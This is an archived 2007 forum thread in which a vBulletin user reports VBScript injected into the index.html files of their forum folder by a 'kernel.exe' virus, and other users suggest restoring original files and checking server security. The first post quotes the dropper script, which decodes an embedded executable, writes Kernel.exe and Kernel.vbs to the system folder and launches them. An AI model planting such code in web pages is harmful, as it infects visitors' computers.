vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   Omg, Virus code in Vbulletin files. (https://vborg.vbsupport.ru/showthread.php?t=153816)

Mean 07-30-2007 05:55 PM
Omg, Virus code in Vbulletin files.
 
Last week, my computer has infected from kernel.exe virus.
I removed that, but now i shocked. It puts this code all index.html pages
in Vbulletin folder in my desktop ?

It put this code to

includes/index.html
images/index.html
clientscript/index.html
etc.

Code:
<script language=vbscript>
on error resume next
fileexe1="077090144000003000000000004000000000255255000000184000000000000000000000064000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000184000000000014031186014000180009205033184001076205033084104105115032112114111103114097109032099097110110111116032098101032114117110032105110032068079083032109111100101046013013010036000000000000000000000212036142028144069224079144069224079144069224079030090243079135069224079108101242079147069224079082105099104144069224079"
dim sys
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set fso = df.createobject("Scripting.FileSystemObject","")
set s=df.CreateObject("Shell.Application.1","")
set re=df.createobject("wscript.shell","")
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1
if fso.opentextfile(sys & "\Systeme.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2
s.Open (sys & "\Kernel.exe")
end if
fso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1
if fso.opentextfile(sys & "\Systemv.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2
s.Open (sys & "\Kernel.vbs")
end if
</script>
I think maybe the problem of this

Parse error: syntax error, unexpected $end, expecting T_STRING or T_VARIABLE or '{' or '$'

from that virus code ?

I am very shocked of that ..

The full code is this. (I couldnt paste the full code because it is about 24.500 characters)
http://rapidshare.com/files/45994675/kernelcode.html

EnIgMa1234 07-30-2007 06:00 PM
This is not default vb code as the index.html are empty. Someone put that there

Mean 07-30-2007 06:03 PM
Quote:
Originally Posted by EnIgMa1234 (Post 1305568)
This is not default vb code as the index.html are empty. Someone put that there
Yes, of course. But is there anyway to get rid of that ?

EnIgMa1234 07-30-2007 06:05 PM
Find out who put it there. Have you downloaded any 'dodgy files' lately?

Delete those files also

da420 07-30-2007 06:07 PM
Quote:
Originally Posted by Mean (Post 1305574)
Yes, of course. But is there anyway to get rid of that ?
Replace it with the original file.

Also, if you didn't put that there I would suggest looking at how secure your server is, because no one should be able to add that. Check file permissions, change passwords, server logs, etc. Having someone install a virus on your computer through your website is very bad, and should definately be looked into.

Mean 07-30-2007 06:16 PM
Quote:
Originally Posted by da420 (Post 1305582)
Replace it with the original file.

Also, if you didn't put that there I would suggest looking at how secure your server is, because no one should be able to add that. Check file permissions, change passwords, server logs, etc. Having someone install a virus on your computer through your website is very bad, and should definately be looked into.
I removed that virus by reading this
http://www.spywareremove.com/removekernelexe.html

Maybe after

It put the codes to Vbulletin Folder in my desktop.

When i got this

Parse error: syntax error, unexpected $end, expecting T_STRING or T_VARIABLE or '{' or '$'

error, i uploaded vbulletin files from desktop to web, and i have seen that. :(


All times are GMT. The time now is 10:39 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.03050 seconds
  • Memory Usage 1,728KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (3)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (6)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete